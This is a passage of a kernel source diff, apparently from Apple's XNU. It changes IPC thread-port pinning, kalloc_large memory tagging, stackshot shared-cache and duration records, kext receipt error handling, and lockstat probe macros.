+       task_t task = convert_port_to_task_no_eval(port);
 
        if (task == TASK_NULL) {
                return KERN_INVALID_ARGUMENT;
@@ -3969,3 +4499,35 @@ task_get_exception_ports_from_user(
        task_deallocate(task);
        return kr;
 }
+
+/*
+ *     Routine:        ipc_thread_port_unpin
+ *     Purpose:
+ *             Called on the thread port when the thread is
+ *             terminating so that the last ref can be deallocated
+ *             without a guard exception.
+ *     Conditions:
+ *             Thread mutex lock is held.
+ *             check_bit should be set to true only when port is expected
+ *             to have ip_pinned bit set.
+ */
+void
+ipc_thread_port_unpin(
+       ipc_port_t port,
+       __unused bool check_bit)
+{
+       if (port == IP_NULL) {
+               return;
+       }
+       ip_lock(port);
+       imq_lock(&port->ip_messages);
+#if DEVELOPMENT || DEBUG
+       if (pinned_control_port_enabled && check_bit) {
+               assert(ip_is_control(port)); /*remove once we get rid of boot-arg */
+               assert(port->ip_pinned == 1);
+       }
+#endif
+       port->ip_pinned = 0;
+       imq_unlock(&port->ip_messages);
+       ip_unlock(port);
+}
index 2ebe7e28968e05d289f0d04b75196034fddb6d98..1e8d2c401a4e983859917ee385d07169e330011d 100644 (file)
@@ -93,9 +93,16 @@ extern void ipc_task_reset(
 extern void ipc_task_terminate(
        task_t          task);
 
+__options_decl(ipc_thread_init_options_t, uint32_t, {
+       IPC_THREAD_INIT_NONE      = 0x00,
+       IPC_THREAD_INIT_PINNED    = 0x01,
+       IPC_THREAD_INIT_IMMOVABLE = 0x02,
+});
+
 /* Initialize a thread's IPC state */
 extern void ipc_thread_init(
-       thread_t        thread);
+       thread_t        thread,
+       ipc_thread_init_options_t options);
 
 extern void ipc_thread_init_exc_actions(
        thread_t        thread);
@@ -168,6 +175,10 @@ extern task_read_t convert_port_to_task_read(
 extern task_t convert_port_to_task(
        ipc_port_t      port);
 
+/* Convert from a port to a pinned task */
+extern task_t convert_port_to_task_pinned(
+       ipc_port_t      port);
+
 extern task_t
 convert_port_to_task_with_exec_token(
        ipc_port_t              port,
@@ -183,9 +194,6 @@ extern task_read_t port_name_to_task_read(
 extern task_read_t port_name_to_task_read_no_eval(
        mach_port_name_t name);
 
-extern task_inspect_t port_name_to_task_inspect(
-       mach_port_name_t name);
-
 extern task_t port_name_to_task_name(
        mach_port_name_t name);
 
@@ -254,4 +262,10 @@ extern void space_read_deallocate(
 extern void space_inspect_deallocate(
        ipc_space_inspect_t     space);
 
+#if MACH_KERNEL_PRIVATE
+extern void ipc_thread_port_unpin(
+       ipc_port_t port,
+       bool check_bit);
+#endif
+
 #endif  /* _KERN_IPC_TT_H_ */
index 6c4127fa6855742cbaa046b627220a06e88caa36..b77841e1c3b4f4ca4d051689e4d57d1b945dc46a 100644 (file)
@@ -750,8 +750,8 @@ kalloc_large(
        zalloc_flags_t        flags,
        vm_allocation_site_t  *site)
 {
-       int kma_flags = KMA_ATOMIC | KMA_KOBJECT;
-       vm_tag_t tag = VM_KERN_MEMORY_KALLOC;
+       int kma_flags = KMA_ATOMIC;
+       vm_tag_t tag;
        vm_map_t alloc_map;
        vm_offset_t addr;
 
@@ -764,6 +764,16 @@ kalloc_large(
                return (struct kalloc_result){ };
        }
 
+#ifndef __x86_64__
+       /*
+        * (73465472) on Intel we didn't use to pass this flag,
+        * which in turned allowed kalloc_large() memory to be shared
+        * with user directly.
+        *
+        * We're bound by this unfortunate ABI.
+        */
+       kma_flags |= KMA_KOBJECT;
+#endif
        if (flags & Z_NOPAGEWAIT) {
                kma_flags |= KMA_NOPAGEWAIT;
        }
@@ -781,8 +791,13 @@ kalloc_large(
 
        alloc_map = kalloc_map_for_size(size);
 
-       if (site) {
-               tag = vm_tag_alloc(site);
+       tag = zalloc_flags_get_tag(flags);
+       if (tag == VM_KERN_MEMORY_NONE) {
+               if (site) {
+                       tag = vm_tag_alloc(site);
+               } else {
+                       tag = VM_KERN_MEMORY_KALLOC;
+               }
        }
 
        if (kmem_alloc_flags(alloc_map, &addr, size, tag, kma_flags) != KERN_SUCCESS) {
@@ -864,7 +879,6 @@ kalloc_ext(
        zalloc_flags_t        flags,
        vm_allocation_site_t  *site)
 {
-       vm_tag_t tag = VM_KERN_MEMORY_KALLOC;
        vm_size_t size;
        void *addr;
        zone_t z;
@@ -881,7 +895,7 @@ kalloc_ext(
         * Kasan for kalloc heaps will put the redzones *inside*
         * the allocation, and hence augment its size.
         *
-        * kalloc heaps do not use zone_t::kasan_redzone.
+        * kalloc heaps do not use zone_t::z_kasan_redzone.
         */
 #if KASAN_KALLOC
        size = kasan_alloc_resize(req_size);
@@ -903,15 +917,19 @@ kalloc_ext(
        assert(size <= zone_elem_size(z));
 
 #if VM_MAX_TAG_ZONES
-       if (z->tags && site) {
-               tag = vm_tag_alloc(site);
-               if ((flags & (Z_NOWAIT | Z_NOPAGEWAIT)) && !vm_allocation_zone_totals[tag]) {
-                       tag = VM_KERN_MEMORY_KALLOC;
+       if (z->tags) {
+               vm_tag_t tag = zalloc_flags_get_tag(flags);
+               if (tag == VM_KERN_MEMORY_NONE && site) {
+                       tag = vm_tag_alloc(site);
+               }
+               if (tag != VM_KERN_MEMORY_NONE) {
+                       tag = vm_tag_will_update_zone(tag, z->tag_zone_index,
+                           flags & (Z_WAITOK | Z_NOWAIT | Z_NOPAGEWAIT));
                }
+               flags |= Z_VM_TAG(tag);
        }
 #endif
-       addr = zalloc_ext(z, kheap->kh_stats ?: z->z_stats,
-           flags | Z_VM_TAG(tag), zone_elem_size(z) - size);
+       addr = zalloc_ext(z, kheap->kh_stats ?: z->z_stats, flags);
 
 #if KASAN_KALLOC
        addr = (void *)kasan_alloc((vm_offset_t)addr, zone_elem_size(z),
index f2eaf624cbea7198077c96f2a903a4a4c69bac08..d57bd0c27ef979ff79b0014f49f8d6993e024da1 100644 (file)
@@ -492,7 +492,7 @@ struct kcdata_type_definition {
 #define STACKSHOT_KCTYPE_TASK_SNAPSHOT               0x905u /* task_snapshot_v2 */
 #define STACKSHOT_KCTYPE_THREAD_SNAPSHOT             0x906u /* thread_snapshot_v2, thread_snapshot_v3 */
 #define STACKSHOT_KCTYPE_DONATING_PIDS               0x907u /* int[] */
-#define STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO        0x908u /* same as KCDATA_TYPE_LIBRARY_LOADINFO64 */
+#define STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO        0x908u /* dyld_shared_cache_loadinfo */
 #define STACKSHOT_KCTYPE_THREAD_NAME                 0x909u /* char[] */
 #define STACKSHOT_KCTYPE_KERN_STACKFRAME             0x90Au /* struct stack_snapshot_frame32 */
 #define STACKSHOT_KCTYPE_KERN_STACKFRAME64           0x90Bu /* struct stack_snapshot_frame64 */
@@ -556,17 +556,42 @@ struct dyld_uuid_info_64 {
        uuid_t   imageUUID;
 };
 
+/*
+ * N.B.: Newer kernels output dyld_shared_cache_loadinfo structures
+ * instead of this, since the field names match their contents better.
+ */
 struct dyld_uuid_info_64_v2 {
        uint64_t imageLoadAddress; /* XXX image slide */
        uuid_t   imageUUID;
        /* end of version 1 of dyld_uuid_info_64. sizeof v1 was 24 */
-       uint64_t imageSlidBaseAddress; /* slid base address of image */
+       uint64_t imageSlidBaseAddress; /* slid base address or slid first mapping of image */
+};
+
+/*
+ * This is the renamed version of dyld_uuid_info_64 with more accurate
+ * field names, for STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO.  Any users
+ * must be aware of the dyld_uuid_info_64* version history and ensure
+ * the fields they are accessing are within the actual bounds.
+ *
+ * OLD_FIELD              NEW_FIELD
+ * imageLoadAddress       sharedCacheSlide
+ * imageUUID              sharedCacheUUID
+ * imageSlidBaseAddress   sharedCacheUnreliableSlidBaseAddress
+ * -                      sharedCacheSlidFirstMapping
+ */
+struct dyld_shared_cache_loadinfo {
+       uint64_t sharedCacheSlide;      /* image slide value */
+       uuid_t   sharedCacheUUID;
+       /* end of version 1 of dyld_uuid_info_64. sizeof v1 was 24 */
+       uint64_t sharedCacheUnreliableSlidBaseAddress;  /* for backwards-compatibility; use sharedCacheSlidFirstMapping if available */
+       /* end of version 2 of dyld_uuid_info_64. sizeof v2 was 32 */
+       uint64_t sharedCacheSlidFirstMapping; /* slid base address of first mapping */
 };
 
 struct dyld_aot_cache_uuid_info {
-       uint64_t x86SlidBaseAddress; /* slid base address of x86 shared cache */
+       uint64_t x86SlidBaseAddress; /* slid first mapping address of x86 shared cache */
        uuid_t x86UUID; /* UUID of x86 shared cache */
-       uint64_t aotSlidBaseAddress; /* slide base address of aot cache */
+       uint64_t aotSlidBaseAddress; /* slide first mapping address of aot cache */
        uuid_t aotUUID; /* UUID of aot shared cache */
 };
 
@@ -618,6 +643,9 @@ enum task_snapshot_flags {
        kTaskIsDirtyTracked                   = 0x4000000,
        kTaskAllowIdleExit                    = 0x8000000,
        kTaskIsTranslated                     = 0x10000000,
+       kTaskSharedRegionNone                 = 0x20000000,     /* task doesn't have a shared region */
+       kTaskSharedRegionSystem               = 0x40000000,     /* task is attached to system shared region */
+       kTaskSharedRegionOther                = 0x80000000,     /* task is attached to a different shared region */
 };
 
 enum thread_snapshot_flags {
@@ -876,6 +904,12 @@ struct stackshot_duration {
        uint64_t stackshot_duration_outer;
 } __attribute__((packed));
 
+struct stackshot_duration_v2 {
+       uint64_t stackshot_duration;
+       uint64_t stackshot_duration_outer;
+       uint64_t stackshot_duration_prior;
+} __attribute__((packed));
+
 struct stackshot_fault_stats {
        uint32_t sfs_pages_faulted_in;      /* number of pages faulted in using KDP fault path */
        uint64_t sfs_time_spent_faulting;   /* MATUs spent faulting */
index 6edec68be9bcde9485c1e115bade5fff36006193..f424b0aee9e2480b29f8a4400bd6224ae5f3b185 100644 (file)
@@ -53,6 +53,7 @@
 #include <kern/coalition.h>
 #include <kern/processor.h>
 #include <kern/host_statistics.h>
+#include <kern/counter.h>
 #include <kern/thread.h>
 #include <kern/thread_group.h>
 #include <kern/task.h>
@@ -115,6 +116,8 @@ static boolean_t panic_stackshot;
 static boolean_t stack_enable_faulting = FALSE;
 static struct stackshot_fault_stats fault_stats;
 
+static uint32_t stackshot_initial_estimate;
+static uint64_t stackshot_duration_prior_abs;   /* prior attempts, abs */
 static unaligned_u64 * stackshot_duration_outer;
 static uint64_t stackshot_microsecs;
 
@@ -385,6 +388,11 @@ stack_snapshot_from_kernel(int pid, void *buf, uint32_t size, uint64_t flags, ui
                goto out;
        }
 
+       stackshot_initial_estimate = 0;
+       stackshot_duration_prior_abs = 0;
+       stackshot_duration_outer = NULL;
+       uint64_t time_start      = mach_absolute_time();
+
        istate = ml_set_interrupts_enabled(FALSE);
 
        /* Preload trace parameters*/
@@ -399,6 +407,10 @@ stack_snapshot_from_kernel(int pid, void *buf, uint32_t size, uint64_t flags, ui
 
        ml_set_interrupts_enabled(istate);
 
+       uint64_t time_end = mach_absolute_time();
+       if (stackshot_duration_outer) {
+               *stackshot_duration_outer = time_end - time_start;
+       }
        *bytes_traced = kdp_stack_snapshot_bytes_traced();
 
 out:
@@ -691,7 +703,9 @@ kern_stack_snapshot_internal(int stackshot_config_version, void *stackshot_confi
                goto error_exit;
        }
 
+       stackshot_duration_prior_abs = 0;
        stackshotbuf_size = get_stackshot_estsize(size_hint);
+       stackshot_initial_estimate = stackshotbuf_size;
 
        for (; stackshotbuf_size <= max_tracebuf_size; stackshotbuf_size <<= 1) {
                if (kmem_alloc_flags(kernel_map, (vm_offset_t *)&stackshotbuf, stackshotbuf_size, VM_KERN_MEMORY_DIAG, KMA_ZERO) != KERN_SUCCESS) {
@@ -755,6 +769,8 @@ kern_stack_snapshot_internal(int stackshot_config_version, void *stackshot_confi
                                /*
                                 * If we didn't allocate a big enough buffer, deallocate and try again.
                                 */
+                               stackshot_duration_prior_abs +=
+                                   (time_end - time_start);
                                continue;
                        } else {
                                goto error_exit;
@@ -968,16 +984,25 @@ kcdata_record_shared_cache_info(kcdata_descriptor_t kcd, task_t task, unaligned_
        kern_return_t error = KERN_SUCCESS;
 
        uint64_t shared_cache_slide = 0;
-       uint64_t shared_cache_base_address = 0;
+       uint64_t shared_cache_first_mapping = 0;
        uint32_t kdp_fault_results = 0;
-       struct dyld_uuid_info_64_v2 shared_cache_data = {0};
+       struct dyld_shared_cache_loadinfo shared_cache_data = {0};
 
 
        assert(task_snap_ss_flags != NULL);
 
+       /* Get basic info about the shared region pointer, regardless of any failures */
+       if (task->shared_region == NULL) {
+               *task_snap_ss_flags |= kTaskSharedRegionNone;
+       } else if (task->shared_region == primary_system_shared_region) {
+               *task_snap_ss_flags |= kTaskSharedRegionSystem;
+       } else {
+               *task_snap_ss_flags |= kTaskSharedRegionOther;
+       }
+
        if (task->shared_region && ml_validate_nofault((vm_offset_t)task->shared_region, sizeof(struct vm_shared_region))) {
                struct vm_shared_region *sr = task->shared_region;
-               shared_cache_base_address = sr->sr_base_address + sr->sr_first_mapping;
+               shared_cache_first_mapping = sr->sr_base_address + sr->sr_first_mapping;
 
        } else {
                *task_snap_ss_flags |= kTaskSharedRegionInfoUnavailable;
@@ -985,7 +1010,7 @@ kcdata_record_shared_cache_info(kcdata_descriptor_t kcd, task_t task, unaligned_
        }
 
        /* We haven't copied in the shared region UUID yet as part of setup */
-       if (!shared_cache_base_address || !task->shared_region->sr_uuid_copied) {
+       if (!shared_cache_first_mapping || !task->shared_region->sr_uuid_copied) {
                goto error_exit;
        }
 
@@ -995,15 +1020,27 @@ kcdata_record_shared_cache_info(kcdata_descriptor_t kcd, task_t task, unaligned_
         */
        shared_cache_slide = task->shared_region->sr_slide;
 
-       if (task->shared_region == init_task_shared_region) {
+       if (task->shared_region == primary_system_shared_region) {
                /* skip adding shared cache info -- it's the same as the system level one */
                goto error_exit;
        }
 
-       shared_cache_data.imageLoadAddress = shared_cache_slide;
-       stackshot_memcpy(&shared_cache_data.imageUUID, task->shared_region->sr_uuid, sizeof(task->shared_region->sr_uuid));
-       shared_cache_data.imageSlidBaseAddress = shared_cache_base_address;
-       kcd_exit_on_error(kcdata_push_data(kcd, STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO, sizeof(struct dyld_uuid_info_64_v2), &shared_cache_data));
+       /*
+        * Historically, this data was in a dyld_uuid_info_64 structure, but the
+        * naming of both the structure and fields for this use wasn't great.  The
+        * dyld_shared_cache_loadinfo structure has better names, but the same
+        * layout and content as the original.
+        *
+        * The imageSlidBaseAddress/sharedCacheUnreliableSlidBaseAddress field
+        * has been used inconsistently for STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT
+        * entries; here, it's the slid first mapping, and we leave it that way
+        * for backwards compatibility.
+        */
+       shared_cache_data.sharedCacheSlide = shared_cache_slide;
+       stackshot_memcpy(&shared_cache_data.sharedCacheUUID, task->shared_region->sr_uuid, sizeof(task->shared_region->sr_uuid));
+       shared_cache_data.sharedCacheUnreliableSlidBaseAddress = shared_cache_first_mapping;
+       shared_cache_data.sharedCacheSlidFirstMapping = shared_cache_first_mapping;
+       kcd_exit_on_error(kcdata_push_data(kcd, STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO, sizeof(shared_cache_data), &shared_cache_data));
 
 error_exit:
        if (kdp_fault_results & KDP_FAULT_RESULT_PAGED_OUT) {
@@ -1347,7 +1384,7 @@ kcdata_record_task_snapshot(kcdata_descriptor_t kcd, task_t task, uint64_t trace
        cur_tsnap->ts_did_throttle = (uint32_t) proc_did_throttle_from_task(task);
 
        cur_tsnap->ts_suspend_count = task->suspend_count;
-       cur_tsnap->ts_faults = task->faults;
+       cur_tsnap->ts_faults = counter_load(&task->faults);
        cur_tsnap->ts_pageins = task->pageins;
        cur_tsnap->ts_cow_faults = task->cow_faults;
        cur_tsnap->ts_latency_qos = (task->effective_policy.tep_latency_qos == LATENCY_QOS_TIER_UNSPECIFIED) ?
@@ -1471,7 +1508,7 @@ kcdata_record_task_delta_snapshot(kcdata_descriptor_t kcd, task_t task, uint64_t
 
        cur_tsnap->tds_max_resident_size = get_task_resident_max(task);
        cur_tsnap->tds_suspend_count = task->suspend_count;
-       cur_tsnap->tds_faults            = task->faults;
+       cur_tsnap->tds_faults            = counter_load(&task->faults);
        cur_tsnap->tds_pageins           = task->pageins;
        cur_tsnap->tds_cow_faults        = task->cow_faults;
        cur_tsnap->tds_was_throttled     = (uint32_t)proc_was_throttled_from_task(task);
@@ -2348,6 +2385,9 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac
        if (trace_flags & STACKSHOT_PAGE_TABLES) {
                kcd_exit_on_error(kcdata_add_uint32_with_description(stackshot_kcdata_p, stack_snapshot_pagetable_mask, "stackshot_pagetable_mask"));
        }
+       if (stackshot_initial_estimate != 0) {
+               kcd_exit_on_error(kcdata_add_uint32_with_description(stackshot_kcdata_p, stackshot_initial_estimate, "stackshot_size_estimate"));
+       }
 
 #if STACKSHOT_COLLECTS_LATENCY_INFO
        latency_info.setup_latency = mach_absolute_time();
@@ -2383,28 +2423,41 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac
        kcd_exit_on_error(kcdata_push_data(stackshot_kcdata_p, KCDATA_TYPE_USECS_SINCE_EPOCH, sizeof(uint64_t), &stackshot_microsecs));
 
        /* record system level shared cache load info (if available) */
-       if (!collect_delta_stackshot && init_task_shared_region &&
-           ml_validate_nofault((vm_offset_t)init_task_shared_region, sizeof(struct vm_shared_region))) {
-               struct dyld_uuid_info_64_v2 sys_shared_cache_info = {0};
+       if (!collect_delta_stackshot && primary_system_shared_region &&
+           ml_validate_nofault((vm_offset_t)primary_system_shared_region, sizeof(struct vm_shared_region))) {
+               struct dyld_shared_cache_loadinfo sys_shared_cache_info = {0};
 
-               stackshot_memcpy(sys_shared_cache_info.imageUUID, &init_task_shared_region->sr_uuid, sizeof(init_task_shared_region->sr_uuid));
-               sys_shared_cache_info.imageLoadAddress =
-                   init_task_shared_region->sr_slide;
-               sys_shared_cache_info.imageSlidBaseAddress =
-                   init_task_shared_region->sr_slide + init_task_shared_region->sr_base_address;
+               /*
+                * Historically, this data was in a dyld_uuid_info_64 structure, but the
+                * naming of both the structure and fields for this use isn't great.  The
+                * dyld_shared_cache_loadinfo structure has better names, but the same
+                * layout and content as the original.
+                *
+                * The imageSlidBaseAddress/sharedCacheUnreliableSlidBaseAddress field
+                * has been used inconsistently for STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT
+                * entries; here, it's the slid base address, and we leave it that way
+                * for backwards compatibility.
+                */
+               stackshot_memcpy(sys_shared_cache_info.sharedCacheUUID, &primary_system_shared_region->sr_uuid, sizeof(primary_system_shared_region->sr_uuid));
+               sys_shared_cache_info.sharedCacheSlide =
+                   primary_system_shared_region->sr_slide;
+               sys_shared_cache_info.sharedCacheUnreliableSlidBaseAddress =
+                   primary_system_shared_region->sr_slide + primary_system_shared_region->sr_base_address;
+               sys_shared_cache_info.sharedCacheSlidFirstMapping =
+                   primary_system_shared_region->sr_base_address + primary_system_shared_region->sr_first_mapping;
 
                kcd_exit_on_error(kcdata_push_data(stackshot_kcdata_p, STACKSHOT_KCTYPE_SHAREDCACHE_LOADINFO,
-                   sizeof(struct dyld_uuid_info_64_v2), &sys_shared_cache_info));
+                   sizeof(sys_shared_cache_info), &sys_shared_cache_info));
 
                if (trace_flags & STACKSHOT_COLLECT_SHAREDCACHE_LAYOUT) {
                        /*
                         * Include a map of the system shared cache layout if it has been populated
                         * (which is only when the system is using a custom shared cache).
                         */
-                       if (init_task_shared_region->sr_images && ml_validate_nofault((vm_offset_t)init_task_shared_region->sr_images,
-                           (init_task_shared_region->sr_images_count * sizeof(struct dyld_uuid_info_64)))) {
-                               assert(init_task_shared_region->sr_images_count != 0);
-                               kcd_exit_on_error(kcdata_push_array(stackshot_kcdata_p, STACKSHOT_KCTYPE_SYS_SHAREDCACHE_LAYOUT, sizeof(struct dyld_uuid_info_64), init_task_shared_region->sr_images_count, init_task_shared_region->sr_images));
+                       if (primary_system_shared_region->sr_images && ml_validate_nofault((vm_offset_t)primary_system_shared_region->sr_images,
+                           (primary_system_shared_region->sr_images_count * sizeof(struct dyld_uuid_info_64)))) {
+                               assert(primary_system_shared_region->sr_images_count != 0);
+                               kcd_exit_on_error(kcdata_push_array(stackshot_kcdata_p, STACKSHOT_KCTYPE_SYS_SHAREDCACHE_LAYOUT, sizeof(struct dyld_uuid_info_64), primary_system_shared_region->sr_images_count, primary_system_shared_region->sr_images));
                        }
                }
        }
@@ -2502,7 +2555,7 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac
                if (!panic_stackshot && (trace_flags & STACKSHOT_SAVE_JETSAM_COALITIONS)) {
                        coalition_begin_cpu_cycle_count = mt_cur_cpu_cycles();
                }
-#endif
+#endif /* INTERRUPT_MASKED_DEBUG && MONOTONIC */
 
                /* Iterate over coalitions */
                if (trace_flags & STACKSHOT_SAVE_JETSAM_COALITIONS) {
@@ -2530,7 +2583,7 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac
                        kcd_exit_on_error(kcdata_add_uint64_with_description(stackshot_kcdata_p, (mt_cur_cpu_cycles() - coalition_begin_cpu_cycle_count),
                            "coalitions_cpu_cycle_count"));
                }
-#endif
+#endif /* INTERRUPT_MASKED_DEBUG && MONOTONIC */
        }
 #else
        trace_flags &= ~(STACKSHOT_SAVE_JETSAM_COALITIONS);
@@ -2557,7 +2610,6 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac
                }
        }
 
-
 #if STACKSHOT_COLLECTS_LATENCY_INFO
        latency_info.total_terminated_task_iteration_latency = mach_absolute_time() - latency_info.total_terminated_task_iteration_latency;
 #endif /* STACKSHOT_COLLECTS_LATENCY_INFO */
@@ -2576,22 +2628,22 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac
 
        /* update timestamp of the stackshot */
        abs_time_end = mach_absolute_time();
-#if DEVELOPMENT || DEBUG
-       struct stackshot_duration stackshot_duration;
-       stackshot_duration.stackshot_duration         = (abs_time_end - abs_time);
-       stackshot_duration.stackshot_duration_outer   = 0;
+       struct stackshot_duration_v2 stackshot_duration = {
+               .stackshot_duration         = (abs_time_end - abs_time),
+               .stackshot_duration_outer   = 0,
+               .stackshot_duration_prior   = stackshot_duration_prior_abs,
+       };
 
        if ((trace_flags & STACKSHOT_DO_COMPRESS) == 0) {
                kcd_exit_on_error(kcdata_get_memory_addr(stackshot_kcdata_p, STACKSHOT_KCTYPE_STACKSHOT_DURATION,
-                   sizeof(struct stackshot_duration), &out_addr));
-               struct stackshot_duration *duration_p = (void *) out_addr;
+                   sizeof(struct stackshot_duration_v2), &out_addr));
+               struct stackshot_duration_v2 *duration_p = (void *) out_addr;
                stackshot_memcpy(duration_p, &stackshot_duration, sizeof(*duration_p));
                stackshot_duration_outer                   = (unaligned_u64 *)&duration_p->stackshot_duration_outer;
        } else {
                kcd_exit_on_error(kcdata_push_data(stackshot_kcdata_p, STACKSHOT_KCTYPE_STACKSHOT_DURATION, sizeof(stackshot_duration), &stackshot_duration));
                stackshot_duration_outer = NULL;
        }
-#endif
 
 #if INTERRUPT_MASKED_DEBUG && MONOTONIC
        if (!panic_stackshot) {
@@ -2610,15 +2662,20 @@ kdp_stackshot_kcdata_format(int pid, uint64_t trace_flags, uint32_t * pBytesTrac
        *pBytesTraced = (uint32_t) kcdata_memory_get_used_bytes(stackshot_kcdata_p);
        *pBytesUncompressed = (uint32_t) kcdata_memory_get_uncompressed_bytes(stackshot_kcdata_p);
 
-error_exit:
+error_exit:;
 
 #if INTERRUPT_MASKED_DEBUG
-       if (trace_flags & STACKSHOT_DO_COMPRESS) {
+       bool disable_interrupts_masked_check = kern_feature_override(
+               KF_INTERRUPT_MASKED_DEBUG_STACKSHOT_OVRD) ||
+           (trace_flags & STACKSHOT_DO_COMPRESS) != 0;
+
+#if STACKSHOT_INTERRUPTS_MASKED_CHECK_DISABLED
+       disable_interrupts_masked_check = true;
+#endif /* STACKSHOT_INTERRUPTS_MASKED_CHECK_DISABLED */
+
+       if (disable_interrupts_masked_check) {
                ml_spin_debug_clear_self();
        }
-#if defined(STACKSHOT_INTERRUPTS_MASKED_CHECK_DISABLED)
-       ml_spin_debug_clear_self();
-#endif
 
        if (!panic_stackshot && interrupt_masked_debug) {
                /*
@@ -2627,7 +2684,7 @@ error_exit:
                 */
                ml_check_stackshot_interrupt_disabled_duration(current_thread());
        }
-#endif
+#endif /* INTERRUPT_MASKED_DEBUG */
 
        stack_enable_faulting = FALSE;
 
@@ -2668,10 +2725,8 @@ kdp_mem_and_io_snapshot(struct mem_and_io_snapshot *memio_snap)
        uint64_t compressions = 0;
        uint64_t decompressions = 0;
 
-       percpu_foreach(stat, vm_stat) {
-               compressions += stat->compressions;
-               decompressions += stat->decompressions;
-       }
+       compressions = counter_load(&vm_statistics_compressions);
+       decompressions = counter_load(&vm_statistics_decompressions);
 
        memio_snap->snapshot_magic = STACKSHOT_MEM_AND_IO_SNAPSHOT_MAGIC;
        memio_snap->free_pages = vm_page_free_count;
@@ -3105,7 +3160,7 @@ stackshot_thread_group_snapshot(void *arg, int i, struct thread_group *tg)
 {
        struct thread_group_snapshot_v2 *thread_groups = (struct thread_group_snapshot_v2 *)arg;
        struct thread_group_snapshot_v2 *tgs = &thread_groups[i];
-       uint64_t flags = kdp_thread_group_get_flags(tg);
+       uint32_t flags = thread_group_get_flags(tg);
        tgs->tgs_id = thread_group_get_id(tg);
        stackshot_memcpy(tgs->tgs_name, thread_group_get_name(tg), THREAD_GROUP_MAXNAME);
        tgs->tgs_flags = ((flags & THREAD_GROUP_FLAGS_EFFICIENT) ? kThreadGroupEfficient : 0) |
index 5a689341faccbe2e18ea5999cf32706b71a0a551..2abe7d4d9b276d5740370903e56b211e9f1392e1 100644 (file)
@@ -39,6 +39,7 @@
 #include <mach-o/loader.h>
 #include <libkern/kernel_mach_header.h>
 #include <libkern/prelink.h>
+#include <libkern/OSKextLibPrivate.h>
 #include <san/kasan.h>
 
 #define KASLR_IOREG_DEBUG 0
@@ -246,23 +247,57 @@ kext_free(vm_offset_t addr, vm_size_t size)
 kern_return_t
 kext_receipt(void **addrp, size_t *sizep)
 {
+       kern_return_t ret = KERN_FAILURE;
        if (addrp == NULL || sizep == NULL) {
-               return KERN_FAILURE;
+               goto finish;
        }
 
        kernel_mach_header_t *kc = PE_get_kc_header(KCKindAuxiliary);
        if (kc == NULL) {
-               return KERN_FAILURE;
+               ret = KERN_MISSING_KC;
+               goto finish;
+       }
+
+       /*
+        * This will be set in early boot once we've successfully checked that
+        * the AuxKC is properly linked against the BootKC. If this isn't set,
+        * and we have a valid AuxKC mach header, then the booter gave us a
+        * bad KC.
+        */
+       if (auxkc_uuid_valid == FALSE) {
+               ret = KERN_INVALID_KC;
+               goto finish;
        }
 
        size_t size;
        void *addr = getsectdatafromheader(kc,
            kReceiptInfoSegment, kAuxKCReceiptSection, &size);
        if (addr == NULL) {
-               return KERN_FAILURE;
+               ret = KERN_INVALID_KC;
+               goto finish;
        }
 
        *addrp = addr;
        *sizep = size;
-       return KERN_SUCCESS;
+       ret = KERN_SUCCESS;
+
+finish:
+       /*
+        * If we do return success, we'll want to wait for the other side to
+        * call kext_receipt_set_queried themselves, so we can confirm that
+        * it made the roundtrip before allowing third party kexts to load.
+        */
+       if (ret != KERN_SUCCESS) {
+               kext_receipt_set_queried();
+       }
+       return ret;
+}
+
+/*
+ * Returns KERN_FAILURE if the variable was already set.
+ */
+kern_return_t
+kext_receipt_set_queried()
+{
+       return OSKextSetReceiptQueried();
 }
index a629bec2ef9f9fd38dcb68c7cc19a06480223bb9..70d34ff9edce4462ace321500fb3e6e2e4145a59 100644 (file)
@@ -43,6 +43,8 @@ void kext_free(vm_offset_t addr, vm_size_t size);
 
 kern_return_t kext_receipt(void **addrp, size_t *sizep);
 
+kern_return_t kext_receipt_set_queried(void);
+
 __END_DECLS
 
 #endif /* _KEXT_ALLOC_H_ */
index 0214122e595abab1f92fec53f5909ff0c71eeff6..ae29df20d30a7dffd345bf6918733dbf5f0fdb19 100644 (file)
@@ -121,18 +121,18 @@ enum lockstat_probe_id {
 
 #if CONFIG_DTRACE
 extern uint32_t lockstat_probemap[LS_NPROBES];
-extern void (*lockstat_probe)(uint32_t, uint64_t, uint64_t,
+extern void dtrace_probe(uint32_t, uint64_t, uint64_t,
     uint64_t, uint64_t, uint64_t);
 /*
  * Macros to record lockstat probes.
  */
 #define LOCKSTAT_RECORD4(probe, lp, arg0, arg1, arg2, arg3)             \
-       {                                                               \
-               uint32_t id;                                         \
-               if (__improbable(id = lockstat_probemap[(probe)])) {            \
-                       (*lockstat_probe)(id, (uintptr_t)(lp), (arg0),  \
-                           (arg1), (arg2), (arg3));                    \
-               }                                                       \
+       {                                                                   \
+               uint32_t id;                                                \
+               if (__improbable(id = lockstat_probemap[(probe)])) {        \
+                       dtrace_probe(id, (uintptr_t)(lp), (arg0),           \
+                           (arg1), (arg2), (arg3));                        \
+               }                                                           \
        }
 #define LOCKSTAT_RECORD_(probe, lp, arg0, arg1, arg2, arg3, ...) LOCKSTAT_RECORD4(probe, lp, arg0, arg1, arg2, arg3)
 #define LOCKSTAT_RECORD__(probe, lp, arg0, arg1, arg2, arg3, ...) LOCKSTAT_RECORD_(probe, lp, arg0, arg1, arg2, arg3)
index aa28feb62a8fdd7041e1f9cc62f2aba9ac0a24a7..9e626c3de0c6bb779b8e62fc7b262fde0fdef6e3 100644 (file)
@@ -497,7 +497,7 @@ lck_attr_free(
  *
  *     Initialize a hardware lock.
  */
-void
+MARK_AS_HIBERNATE_TEXT void
 hw_lock_init(hw_lock_t lock)
 {
        ordered_store_hw(lock, 0);
